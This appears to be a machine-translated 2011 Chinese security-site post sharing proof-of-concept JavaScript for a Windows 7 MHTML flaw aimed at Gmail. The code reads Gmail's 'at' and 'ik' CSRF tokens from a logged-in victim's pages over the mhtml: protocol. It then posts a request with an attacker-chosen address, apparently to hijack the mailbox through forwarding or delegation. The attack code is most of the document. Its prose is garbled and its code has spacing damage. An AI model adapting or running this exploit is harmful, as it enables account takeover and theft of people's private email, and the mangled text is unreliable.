A period of WIN7 under GMAIL MHTML vulnerability test code-vulnerability warning-the black bar safety net

2011-05-10T00:00:00
ID MYHACK58:62201130405
Type myhack58
Reporter 佚名
Modified 2011-05-10T00:00:00

Description

RAyh4c black box Long time no update blog, and turn to a section 7 under the GMAIL MHTML vulnerability test code, finally written the full version of the Don't know to throw which went to the - -!

The MHTML vulnerability in WINDOWS 7 to initiate the AJAX request, does not like XP, direct request HTTP Protocol you can, the URL of the request must also be in the MHTML Protocol, otherwise there is no permissions WIN7 under the same-origin policy looks like than XP strict? Don't know someone to pay attention to the details of this no.

To test the GMAIL to the relevant authority of the CSRF must be taken to AT and IK of the two parameters can only be successful, of course, taking these two parameters in many ways, from COOKIES to take you can also from the page directly, the following code directly from the page.

xmlHttp=new ActiveXObject("Microsoft. xmlHttp"); xmlHttp. open("GET","mhtml:https://mail. google. com/mail/h/0/",true); xmlHttp. send();

xmlHttp. onreadystatechange = function() { if (xmlHttp. readyState == 4) { if (xmlHttp. status == 2 0 0) { REX = /href=\".? at=(. {3 4})\">/. exec(xmlHttp. responseText); AThash = RegExp.$ 1; xmlHttp. open("GET","mhtml:https://mail. google. com/mail/",true); xmlHttp. send(); xmlHttp. onreadystatechange = function() { if (xmlHttp. readyState == 4) { if (xmlHttp. status == 2 0 0) { REX = /GLOBALS=\[.?," (. {1 0})",/. exec(xmlHttp. responseText); IKhash = RegExp.$ 1; xmlHttp. open("POST","mhtml:https://mail. google. com/mail/? ui=2"+"&ik="+IKhash+"&view=mdlg&at="+AThash,true); xmlHttp. setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlHttp. send("mdrp=1&mda=%0D%0A"+Tmail+"%0D%0A"); } } } } } } }